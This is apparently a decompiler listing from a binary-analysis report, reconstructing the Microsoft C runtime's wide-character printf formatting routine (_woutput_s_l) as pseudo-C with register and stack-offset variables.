
                            Uniqueness Score: -1.00%

                            C-Code - Quality: 69%
                            			E00423424(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                            				intOrPtr _t482;
                            				signed int _t484;
                            				signed int _t487;
                            				void* _t492;
                            				signed int _t494;
                            				void* _t502;
                            				void* _t520;
                            				signed int _t524;
                            				void* _t534;
                            				signed int _t567;
                            				signed int _t573;
                            				void* _t594;
                            				void* _t595;
                            				signed int _t596;
                            				void* _t598;
                            				void* _t599;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t595 = __esi;
                            					_t594 = __edi;
                            					_t534 = __ebx;
                            					_t482 = E0041C290(_t596 + 0x14);
                            					_t599 = _t598 + 4;
                            					 *((intOrPtr*)(_t596 - 0x474)) = _t482;
                            					if( *((intOrPtr*)(_t596 - 0x474)) == 0) {
                            						goto L76;
                            					}
                            					L75:
                            					__ecx =  *(__ebp - 0x474);
                            					if( *(__ecx + 4) != 0) {
                            						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
                            						if(( *(__ebp - 0x10) & 0x00000800) == 0) {
                            							 *(__ebp - 0xc) = 0;
                            							__edx =  *(__ebp - 0x474);
                            							__eax =  *(__edx + 4);
                            							 *(__ebp - 4) =  *(__edx + 4);
                            							__ecx =  *(__ebp - 0x474);
                            							__edx =  *__ecx;
                            							 *(__ebp - 0x24) =  *__ecx;
                            						} else {
                            							__edx =  *(__ebp - 0x474);
                            							__eax =  *(__edx + 4);
                            							 *(__ebp - 4) =  *(__edx + 4);
                            							__ecx =  *(__ebp - 0x474);
                            							__eax =  *__ecx;
                            							asm("cdq");
                            							 *__ecx - __edx =  *__ecx - __edx >> 1;
                            							 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
                            							 *(__ebp - 0xc) = 1;
                            						}
                            						L80:
                            						while(1) {
                            							L187:
                            							if( *(_t596 - 0x28) != 0) {
                            								goto L212;
                            							}
                            							L188:
                            							if(( *(_t596 - 0x10) & 0x00000040) != 0) {
                            								if(( *(_t596 - 0x10) & 0x00000100) == 0) {
                            									if(( *(_t596 - 0x10) & 0x00000001) == 0) {
                            										if(( *(_t596 - 0x10) & 0x00000002) != 0) {
                            											 *((short*)(_t596 - 0x14)) = 0x20;
                            											 *(_t596 - 0x1c) = 1;
                            										}
                            									} else {
                            										 *((short*)(_t596 - 0x14)) = 0x2b;
                            										 *(_t596 - 0x1c) = 1;
                            									}
                            								} else {
                            									 *((short*)(_t596 - 0x14)) = 0x2d;
                            									 *(_t596 - 0x1c) = 1;
                            								}
                            							}
                            							 *((intOrPtr*)(_t596 - 0x4ac)) =  *((intOrPtr*)(_t596 - 0x18)) -  *(_t596 - 0x24) -  *(_t596 - 0x1c);
                            							if(( *(_t596 - 0x10) & 0x0000000c) == 0) {
                            								E00423FF0(0x20,  *((intOrPtr*)(_t596 - 0x4ac)),  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
                            								_t599 = _t599 + 0x10;
                            							}
                            							E00424030( *(_t596 - 0x1c), _t596 - 0x14,  *(_t596 - 0x1c),  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
                            							_t599 = _t599 + 0x10;
                            							if(( *(_t596 - 0x10) & 0x00000008) != 0) {
                            								if(( *(_t596 - 0x10) & 0x00000004) == 0) {
                            									E00423FF0(0x30,  *((intOrPtr*)(_t596 - 0x4ac)),  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
                            									_t599 = _t599 + 0x10;
                            								}
                            							}
                            							if( *(_t596 - 0xc) != 0) {
                            								L208:
                            								E00424030( *(_t596 - 0x24),  *(_t596 - 4),  *(_t596 - 0x24),  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
                            								_t599 = _t599 + 0x10;
                            								goto L209;
                            							} else {
                            								L201:
                            								if( *(_t596 - 0x24) <= 0) {
                            									goto L208;
                            								}
                            								L202:
                            								 *(_t596 - 0x4b0) =  *(_t596 - 4);
                            								 *(_t596 - 0x4b4) =  *(_t596 - 0x24);
                            								while(1) {
                            									L203:
                            									 *(_t596 - 0x4b4) =  *(_t596 - 0x4b4) - 1;
                            									if( *(_t596 - 0x4b4) <= 0) {
                            										break;
                            									}
                            									L204:
                            									_t520 = E0040D3B0(_t596 - 0x40);
                            									_t524 = E00419150(_t596 - 0x458,  *(_t596 - 0x4b0),  *((intOrPtr*)( *((intOrPtr*)(E0040D3B0(_t596 - 0x40))) + 0xac)), _t520);
                            									_t599 = _t599 + 0x10;
                            									 *(_t596 - 0x4b8) = _t524;
                            									if( *(_t596 - 0x4b8) > 0) {
                            										L206:
                            										E00423F90( *(_t596 - 0x458) & 0x0000ffff,  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
                            										_t599 = _t599 + 0xc;
                            										 *(_t596 - 0x4b0) =  *(_t596 - 0x4b0) +  *(_t596 - 0x4b8);
                            										continue;
                            									}
                            									L205:
                            									 *(_t596 - 0x44c) = 0xffffffff;
                            									break;
                            								}
                            								L207:
                            								L209:
                            								if( *(_t596 - 0x44c) >= 0) {
                            									if(( *(_t596 - 0x10) & 0x00000004) != 0) {
                            										E00423FF0(0x20,  *((intOrPtr*)(_t596 - 0x4ac)),  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
                            										_t599 = _t599 + 0x10;
                            									}
                            								}
                            							}
                            							L212:
                            							if( *(_t596 - 0x20) != 0) {
                            								L0040C240( *(_t596 - 0x20), 2);
                            								_t599 = _t599 + 8;
                            								 *(_t596 - 0x20) = 0;
                            							}
                            							while(1) {
                            								L214:
                            								 *(_t596 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t596 + 0xc))));
                            								_t535 =  *(_t596 - 0x454) & 0x0000ffff;
                            								 *((intOrPtr*)(_t596 + 0xc)) =  *((intOrPtr*)(_t596 + 0xc)) + 2;
                            								if(( *(_t596 - 0x454) & 0x0000ffff) == 0 ||  *(_t596 - 0x44c) < 0) {
                            									break;
                            								} else {
                            									if(( *(_t596 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t596 - 0x454) & 0x0000ffff) > 0x78) {
                            										 *(_t596 - 0x4d8) = 0;
                            									} else {
                            										 *(_t596 - 0x4d8) =  *(( *(_t596 - 0x454) & 0x0000ffff) + L"pecifier\", 0)") & 0xf;
                            									}
                            								}
                            								L7:
                            								 *(_t596 - 0x450) =  *(_t596 - 0x4d8);
                            								_t573 =  *(_t596 - 0x450) * 9;
                            								_t494 =  *(_t596 - 0x45c);
                            								_t543 = ( *(_t573 + _t494 + 0x4083d0) & 0x000000ff) >> 4;
                            								 *(_t596 - 0x45c) = ( *(_t573 + _t494 + 0x4083d0) & 0x000000ff) >> 4;
                            								if( *(_t596 - 0x45c) != 8) {
                            									L16:
                            									 *(_t596 - 0x4e0) =  *(_t596 - 0x45c);
                            									if( *(_t596 - 0x4e0) > 7) {
                            										continue;
                            									}
                            									L17:
                            									switch( *((intOrPtr*)( *(_t596 - 0x4e0) * 4 +  &M00423E84))) {
                            										case 0:
                            											L18:
                            											 *(_t596 - 0xc) = 1;
                            											E00423F90( *(_t596 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
                            											_t599 = _t599 + 0xc;
                            											goto L214;
                            										case 1:
                            											L19:
                            											 *(__ebp - 0x2c) = 0;
                            											__ecx =  *(__ebp - 0x2c);
                            											 *(__ebp - 0x28) = __ecx;
                            											__edx =  *(__ebp - 0x28);
                            											 *(__ebp - 0x18) =  *(__ebp - 0x28);
                            											__eax =  *(__ebp - 0x18);
                            											 *(__ebp - 0x1c) =  *(__ebp - 0x18);
                            											 *(__ebp - 0x10) = 0;
                            											 *(__ebp - 0x30) = 0xffffffff;
                            											 *(__ebp - 0xc) = 0;
                            											goto L214;
                            										case 2:
                            											L20:
                            											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            											 *(__ebp - 0x4e4) = __ecx;
                            											 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
                            											 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
                            											__eflags =  *(__ebp - 0x4e4) - 0x10;
                            											if( *(__ebp - 0x4e4) > 0x10) {
                            												goto L27;
                            											}
                            											L21:
                            											_t59 =  *(__ebp - 0x4e4) + 0x423ebc; // 0x498d04
                            											__ecx =  *_t59 & 0x000000ff;
                            											switch( *((intOrPtr*)(__ecx * 4 +  &M00423EA4))) {
                            												case 0:
                            													goto L24;
                            												case 1:
                            													goto L25;
                            												case 2:
                            													goto L23;
                            												case 3:
                            													goto L22;
                            												case 4:
                            													goto L26;
                            												case 5:
                            													goto L27;
                            											}
                            										case 3:
                            											L28:
                            											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            											__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
                            											if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
                            												__edx =  *(__ebp - 0x18);
                            												__edx =  *(__ebp - 0x18) * 0xa;
                            												__eflags = __edx;
                            												_t83 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
                            												__ecx = __edx + _t83;
                            												 *(__ebp - 0x18) = __ecx;
                            											} else {
                            												__edx = __ebp + 0x14;
                            												 *(__ebp - 0x18) = E0041C290(__ebp + 0x14);
                            												__eflags =  *(__ebp - 0x18);
                            												if( *(__ebp - 0x18) < 0) {
                            													__eax =  *(__ebp - 0x10);
                            													__eax =  *(__ebp - 0x10) | 0x00000004;
                            													__eflags = __eax;
                            													 *(__ebp - 0x10) = __eax;
                            													__ecx =  *(__ebp - 0x18);
                            													__ecx =  ~( *(__ebp - 0x18));
                            													 *(__ebp - 0x18) = __ecx;
                            												}
                            											}
                            											L33:
                            											goto L214;
                            										case 4:
                            											L34:
                            											 *(__ebp - 0x30) = 0;
                            											goto L214;
                            										case 5:
                            											L35:
                            											__edx =  *(__ebp - 0x454) & 0x0000ffff;
                            											__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
                            											if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
                            												__ecx =  *(__ebp - 0x30);
                            												__ecx =  *(__ebp - 0x30) * 0xa;
                            												__eflags = __ecx;
                            												_t94 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
                            												__eax = __ecx + _t94;
                            												 *(__ebp - 0x30) = __ecx + _t94;
                            											} else {
                            												__eax = __ebp + 0x14;
                            												 *(__ebp - 0x30) = E0041C290(__ebp + 0x14);
                            												__eflags =  *(__ebp - 0x30);
                            												if( *(__ebp - 0x30) < 0) {
                            													 *(__ebp - 0x30) = 0xffffffff;
                            												}
                            											}
                            											goto L214;
                            										case 6:
                            											L41:
                            											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            											 *(__ebp - 0x4e8) = __ecx;
                            											 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
                            											 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
                            											__eflags =  *(__ebp - 0x4e8) - 0x2e;
                            											if( *(__ebp - 0x4e8) > 0x2e) {
                            												L64:
                            												goto L214;
                            											}
                            											L42:
                            											_t102 =  *(__ebp - 0x4e8) + 0x423ee4; // 0x36f19003
                            											__ecx =  *_t102 & 0x000000ff;
                            											switch( *((intOrPtr*)(__ecx * 4 +  &M00423ED0))) {
                            												case 0:
                            													L47:
                            													__ecx =  *(__ebp + 0xc);
                            													__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            													__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x36;
                            													if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
                            														L50:
                            														__ecx =  *(__ebp + 0xc);
                            														__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            														__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x33;
                            														if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
                            															L53:
                            															__ecx =  *(__ebp + 0xc);
                            															__edx =  *__ecx & 0x0000ffff;
                            															__eflags = ( *__ecx & 0x0000ffff) - 0x64;
                            															if(( *__ecx & 0x0000ffff) == 0x64) {
                            																L59:
                            																L61:
                            																goto L64;
                            															}
                            															L54:
                            															__eax =  *(__ebp + 0xc);
                            															__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            															__eflags = __ecx - 0x69;
                            															if(__ecx == 0x69) {
                            																goto L59;
                            															}
                            															L55:
                            															__edx =  *(__ebp + 0xc);
                            															__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            															__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6f;
                            															if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
                            																goto L59;
                            															}
                            															L56:
                            															__ecx =  *(__ebp + 0xc);
                            															__edx =  *__ecx & 0x0000ffff;
                            															__eflags = ( *__ecx & 0x0000ffff) - 0x75;
                            															if(( *__ecx & 0x0000ffff) == 0x75) {
                            																goto L59;
                            															}
                            															L57:
                            															__eax =  *(__ebp + 0xc);
                            															__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            															__eflags = __ecx - 0x78;
                            															if(__ecx == 0x78) {
                            																goto L59;
                            															}
                            															L58:
                            															__edx =  *(__ebp + 0xc);
                            															__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            															__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x58;
                            															if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
                            																 *(__ebp - 0x45c) = 0;
                            																goto L18;
                            															}
                            															goto L59;
                            														}
                            														L51:
                            														__eax =  *(__ebp + 0xc);
                            														__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
                            														__eflags = __ecx - 0x32;
                            														if(__ecx != 0x32) {
                            															goto L53;
                            														} else {
                            															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
                            															goto L61;
                            														}
                            													}
                            													L48:
                            													__eax =  *(__ebp + 0xc);
                            													__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
                            													__eflags = __ecx - 0x34;
                            													if(__ecx != 0x34) {
                            														goto L50;
                            													} else {
                            														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
                            														goto L61;
                            													}
                            												case 1:
                            													L62:
                            													__ecx =  *(__ebp - 0x10);
                            													__ecx =  *(__ebp - 0x10) | 0x00000020;
                            													 *(__ebp - 0x10) = __ecx;
                            													goto L64;
                            												case 2:
                            													L43:
                            													__edx =  *(__ebp + 0xc);
                            													__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            													__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6c;
                            													if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
                            														__eax =  *(__ebp - 0x10);
                            														__eax =  *(__ebp - 0x10) | 0x00000010;
                            														__eflags = __eax;
                            														 *(__ebp - 0x10) = __eax;
                            													} else {
                            														__ecx =  *(__ebp + 0xc);
                            														__ecx =  *(__ebp + 0xc) + 2;
                            														 *(__ebp + 0xc) = __ecx;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            													}
                            													goto L64;
                            												case 3:
                            													L63:
                            													__edx =  *(__ebp - 0x10);
                            													__edx =  *(__ebp - 0x10) | 0x00000800;
                            													__eflags = __edx;
                            													 *(__ebp - 0x10) = __edx;
                            													goto L64;
                            												case 4:
                            													goto L64;
                            											}
                            										case 7:
                            											L65:
                            											__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            											 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
                            											__ecx =  *(__ebp - 0x4ec);
                            											__ecx =  *(__ebp - 0x4ec) - 0x41;
                            											 *(__ebp - 0x4ec) = __ecx;
                            											__eflags =  *(__ebp - 0x4ec) - 0x37;
                            											if( *(__ebp - 0x4ec) > 0x37) {
                            												goto L187;
                            												do {
                            													do {
                            														while(1) {
                            															L187:
                            															if( *(_t596 - 0x28) != 0) {
                            																goto L212;
                            															}
                            															goto L188;
                            														}
                            														L183:
                            														__ebp - 0x249 = __ebp - 0x249 -  *(__ebp - 4);
                            														 *(__ebp - 0x24) = __ebp - 0x249 -  *(__ebp - 4);
                            														__ecx =  *(__ebp - 4);
                            														__ecx =  *(__ebp - 4) + 1;
                            														 *(__ebp - 4) = __ecx;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
                            														__eflags =  *(__ebp - 0x10) & 0x00000200;
                            													} while (( *(__ebp - 0x10) & 0x00000200) == 0);
                            													__eflags =  *(__ebp - 0x24);
                            													if( *(__ebp - 0x24) == 0) {
                            														break;
                            													}
                            													L185:
                            													__eax =  *(__ebp - 4);
                            													__ecx =  *( *(__ebp - 4));
                            													__eflags = __ecx - 0x30;
                            												} while (__ecx == 0x30);
                            												L186:
                            												 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            												 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            												__eax =  *(__ebp - 4);
                            												 *( *(__ebp - 4)) = 0x30;
                            												__ecx =  *(__ebp - 0x24);
                            												__ecx =  *(__ebp - 0x24) + 1;
                            												__eflags = __ecx;
                            												 *(__ebp - 0x24) = __ecx;
                            												while(1) {
                            													L187:
                            													if( *(_t596 - 0x28) != 0) {
                            														goto L212;
                            													}
                            													goto L188;
                            												}
                            											}
                            											L66:
                            											_t143 =  *(__ebp - 0x4ec) + 0x423f50; // 0xcccccc0d
                            											__eax =  *_t143 & 0x000000ff;
                            											switch( *((intOrPtr*)(( *_t143 & 0x000000ff) * 4 +  &M00423F14))) {
                            												case 0:
                            													L119:
                            													 *(__ebp - 0x2c) = 1;
                            													 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
                            													__eflags = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
                            													 *(__ebp - 0x454) = __ax;
                            													goto L120;
                            												case 1:
                            													L67:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            													__eflags =  *(__ebp - 0x10) & 0x00000830;
                            													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            														__edx =  *(__ebp - 0x10);
                            														__edx =  *(__ebp - 0x10) | 0x00000020;
                            														__eflags = __edx;
                            														 *(__ebp - 0x10) = __edx;
                            													}
                            													goto L69;
                            												case 2:
                            													L81:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            													__eflags =  *(__ebp - 0x10) & 0x00000830;
                            													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            														__ecx =  *(__ebp - 0x10);
                            														__ecx =  *(__ebp - 0x10) | 0x00000020;
                            														__eflags = __ecx;
                            														 *(__ebp - 0x10) = __ecx;
                            													}
                            													goto L83;
                            												case 3:
                            													L143:
                            													 *(__ebp - 0x460) = 7;
                            													goto L145;
                            												case 4:
                            													goto L0;
                            												case 5:
                            													L120:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													__edx = __ebp - 0x448;
                            													 *(__ebp - 4) = __ebp - 0x448;
                            													 *(__ebp - 0x44) = 0x200;
                            													__eflags =  *(__ebp - 0x30);
                            													if( *(__ebp - 0x30) >= 0) {
                            														L122:
                            														__eflags =  *(__ebp - 0x30);
                            														if( *(__ebp - 0x30) != 0) {
                            															L125:
                            															__eflags =  *(__ebp - 0x30) - 0x200;
                            															if( *(__ebp - 0x30) > 0x200) {
                            																 *(__ebp - 0x30) = 0x200;
                            															}
                            															L127:
                            															__eflags =  *(__ebp - 0x30) - 0xa3;
                            															if( *(__ebp - 0x30) > 0xa3) {
                            																__ecx =  *(__ebp - 0x30);
                            																__ecx =  *(__ebp - 0x30) + 0x15d;
                            																 *(__ebp - 0x20) = L0040B5C0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
                            																__eflags =  *(__ebp - 0x20);
                            																if( *(__ebp - 0x20) == 0) {
                            																	 *(__ebp - 0x30) = 0xa3;
                            																} else {
                            																	__edx =  *(__ebp - 0x20);
                            																	 *(__ebp - 4) =  *(__ebp - 0x20);
                            																	 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																	 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
                            																}
                            															}
                            															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            															__edx =  *(__ebp + 0x14);
                            															__eax =  *(__edx - 8);
                            															__ecx =  *(__edx - 4);
                            															 *(__ebp - 0x490) =  *(__edx - 8);
                            															 *(__ebp - 0x48c) =  *(__edx - 4);
                            															__ecx = __ebp - 0x40;
                            															_push(E0040D3B0(__ebp - 0x40));
                            															__edx =  *(__ebp - 0x2c);
                            															_push( *(__ebp - 0x2c));
                            															__eax =  *(__ebp - 0x30);
                            															_push( *(__ebp - 0x30));
                            															__ecx =  *(__ebp - 0x454);
                            															_push( *(__ebp - 0x454));
                            															__edx =  *(__ebp - 0x44);
                            															_push( *(__ebp - 0x44));
                            															__eax =  *(__ebp - 4);
                            															_push( *(__ebp - 4));
                            															__ecx = __ebp - 0x490;
                            															_push(__ebp - 0x490);
                            															__edx =  *0x60b3cc; // 0x7e8c4bdb
                            															E00410200(__edx) =  *__eax();
                            															__esp = __esp + 0x1c;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            															__eflags =  *(__ebp - 0x10) & 0x00000080;
                            															if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																__eflags =  *(__ebp - 0x30);
                            																if( *(__ebp - 0x30) == 0) {
                            																	__ecx = __ebp - 0x40;
                            																	_push(E0040D3B0(__ebp - 0x40));
                            																	__ecx =  *(__ebp - 4);
                            																	_push( *(__ebp - 4));
                            																	__edx =  *0x60b3d8; // 0x7e8c4bdb
                            																	E00410200(__edx) =  *__eax();
                            																	__esp = __esp + 8;
                            																}
                            															}
                            															__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            															__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
                            															if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																if(( *(__ebp - 0x10) & 0x00000080) == 0) {
                            																	__ecx = __ebp - 0x40;
                            																	_push(E0040D3B0(__ebp - 0x40));
                            																	__edx =  *(__ebp - 4);
                            																	_push( *(__ebp - 4));
                            																	__eax =  *0x60b3d4; // 0x7e8c4bdb
                            																	__eax =  *__eax();
                            																	__esp = __esp + 8;
                            																}
                            															}
                            															__ecx =  *(__ebp - 4);
                            															__edx =  *( *(__ebp - 4));
                            															__eflags =  *( *(__ebp - 4)) - 0x2d;
                            															if( *( *(__ebp - 4)) == 0x2d) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																__ecx =  *(__ebp - 4);
                            																__ecx =  *(__ebp - 4) + 1;
                            																__eflags = __ecx;
                            																 *(__ebp - 4) = __ecx;
                            															}
                            															__edx =  *(__ebp - 4);
                            															 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            															goto L187;
                            														}
                            														L123:
                            														__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            														__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
                            														if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
                            															goto L125;
                            														}
                            														L124:
                            														 *(__ebp - 0x30) = 1;
                            														goto L127;
                            													}
                            													L121:
                            													 *(__ebp - 0x30) = 6;
                            													goto L127;
                            												case 6:
                            													L69:
                            													 *(__ebp - 0xc) = 1;
                            													__ebp + 0x14 = E0041C290(__ebp + 0x14);
                            													 *(__ebp - 0x458) = __ax;
                            													__ecx =  *(__ebp - 0x10);
                            													__ecx =  *(__ebp - 0x10) & 0x00000020;
                            													__eflags = __ecx;
                            													if(__ecx == 0) {
                            														 *(__ebp - 0x448) =  *(__ebp - 0x458);
                            													} else {
                            														 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
                            														 *(__ebp - 0x470) = __dl;
                            														 *((char*)(__ebp - 0x46f)) = 0;
                            														__ecx = __ebp - 0x40;
                            														__eax = E0040D3B0(__ebp - 0x40);
                            														__ecx = __ebp - 0x40;
                            														E0040D3B0(__ebp - 0x40) =  *__eax;
                            														__ecx =  *(__ebp - 0x448 + 0xac);
                            														__edx = __ebp - 0x470;
                            														__eax = __ebp - 0x448;
                            														__eax = E00419150(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448);
                            														__eflags = __eax;
                            														if(__eax < 0) {
                            															 *(__ebp - 0x28) = 1;
                            														}
                            													}
                            													__edx = __ebp - 0x448;
                            													 *(__ebp - 4) = __ebp - 0x448;
                            													 *(__ebp - 0x24) = 1;
                            													do {
                            														L187:
                            														if( *(_t596 - 0x28) != 0) {
                            															goto L212;
                            														}
                            														goto L188;
                            													} while ( *(__ebp - 0x4ec) > 0x37);
                            													goto L66;
                            												case 7:
                            													L140:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            													 *(__ebp - 8) = 0xa;
                            													goto L150;
                            												case 8:
                            													L105:
                            													__eax = __ebp + 0x14;
                            													 *(__ebp - 0x484) = E0041C290(__ebp + 0x14);
                            													__eax = E00420F80();
                            													__eflags = __eax;
                            													if(__eax != 0) {
                            														L115:
                            														__ecx =  *(__ebp - 0x10);
                            														__ecx =  *(__ebp - 0x10) & 0x00000020;
                            														__eflags = __ecx;
                            														if(__ecx == 0) {
                            															__ecx =  *(__ebp - 0x484);
                            															__edx =  *(__ebp - 0x44c);
                            															 *__ecx =  *(__ebp - 0x44c);
                            														} else {
                            															__edx =  *(__ebp - 0x484);
                            															__ax =  *(__ebp - 0x44c);
                            															 *( *(__ebp - 0x484)) = __ax;
                            														}
                            														 *(__ebp - 0x28) = 1;
                            														while(1) {
                            															L187:
                            															if( *(_t596 - 0x28) != 0) {
                            																goto L212;
                            															}
                            															goto L188;
                            														}
                            													}
                            													L106:
                            													__ecx = 0;
                            													__eflags = 0;
                            													if(0 == 0) {
                            														 *(__ebp - 0x4f4) = 0;
                            													} else {
                            														 *(__ebp - 0x4f4) = 1;
                            													}
                            													__edx =  *(__ebp - 0x4f4);
                            													 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
                            													__eflags =  *(__ebp - 0x488);
                            													if( *(__ebp - 0x488) == 0) {
                            														_push(L"(\"\'n\' format specifier disabled\", 0)");
                            														_push(0);
                            														_push(0x695);
                            														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            														_push(2);
                            														__eax = L0040E1A0();
                            														__esp = __esp + 0x14;
                            														__eflags = __eax - 1;
                            														if(__eax == 1) {
                            															asm("int3");
                            														}
                            													}
                            													__eflags =  *(__ebp - 0x488);
                            													if( *(__ebp - 0x488) != 0) {
                            														L114:
                            														while(1) {
                            															L187:
                            															if( *(_t596 - 0x28) != 0) {
                            																goto L212;
                            															}
                            															goto L188;
                            														}
                            													} else {
                            														L113:
                            														 *((intOrPtr*)(L0040EC70(__ecx))) = 0x16;
                            														__eax = E00411A50(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
                            														 *(__ebp - 0x4cc) = 0xffffffff;
                            														__ecx = __ebp - 0x40;
                            														__eax = E0040D380(__ecx);
                            														__eax =  *(__ebp - 0x4cc);
                            														goto L225;
                            													}
                            												case 9:
                            													L148:
                            													 *(__ebp - 8) = 8;
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            													__eflags =  *(__ebp - 0x10) & 0x00000080;
                            													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            														__edx =  *(__ebp - 0x10);
                            														__edx =  *(__ebp - 0x10) | 0x00000200;
                            														__eflags = __edx;
                            														 *(__ebp - 0x10) = __edx;
                            													}
                            													goto L150;
                            												case 0xa:
                            													L142:
                            													 *(__ebp - 0x30) = 8;
                            													goto L143;
                            												case 0xb:
                            													L83:
                            													__eflags =  *(__ebp - 0x30) - 0xffffffff;
                            													if( *(__ebp - 0x30) != 0xffffffff) {
                            														__edx =  *(__ebp - 0x30);
                            														 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
                            													} else {
                            														 *(__ebp - 0x4f0) = 0x7fffffff;
                            													}
                            													__eax =  *(__ebp - 0x4f0);
                            													 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
                            													__ecx = __ebp + 0x14;
                            													 *(__ebp - 4) = E0041C290(__ebp + 0x14);
